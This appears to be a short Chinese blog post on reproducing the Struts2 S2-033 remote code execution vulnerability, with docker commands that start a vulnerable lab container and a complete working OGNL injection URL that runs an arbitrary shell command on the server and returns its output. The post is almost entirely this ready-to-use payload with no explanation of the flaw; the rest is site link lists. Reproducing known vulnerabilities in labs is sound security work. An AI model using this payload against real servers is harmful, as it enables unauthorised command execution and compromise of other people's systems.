zoukankan html css js c++ java

漏洞复现：Struts2 远程代码执行漏洞(S2-033)

docker pull medicean/vulapps:s_struts2_s2-033

`docker run -d -p 80:8080 medicean/vulapps:s_struts2_s2-033`

EXP:

http://127.0.0.1:8080/orders/4/%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23xx%3d123,%23rs%3d@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23rs),%23wr.close(),%23xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=2908&command=id


参考：http://vulapps.evalbug.com/s_struts2_s2-033/

记得旧文章便是新举子

查看全文

相关阅读:
Emacs教程
 华为上机测试 2015
奇偶排序
 C语言中的EOF和回车不一样
 jquery 使用方法
 1116
1115
1109
Oracle14~23
get与post的区别

原文地址：https://www.cnblogs.com/NBeveryday/p/8195140.html

最新文章
字符串匹配
 数据结构与算法系列总目录
 Python标准模块logging（转）
自动化测试有感
 find_elements & find_element区分
 转化到frame窗口中：browser.swicth_to_frame()
Webdriver (python)中调用JS
遍历页面中所有下拉框中
 Webdriver的下拉框选择
 Selenium 生成HTML的测试报告

热门文章
selenium pydev环境配置中IEdriver server失败
 HTML的布局
 jquery实现简单瀑布流
 想在这里开始自己不一样的人生
 Java UDP 数据报
 Java TCP 程序
 单例模式singleton
排序算法
 twoSum
Emacs配置文件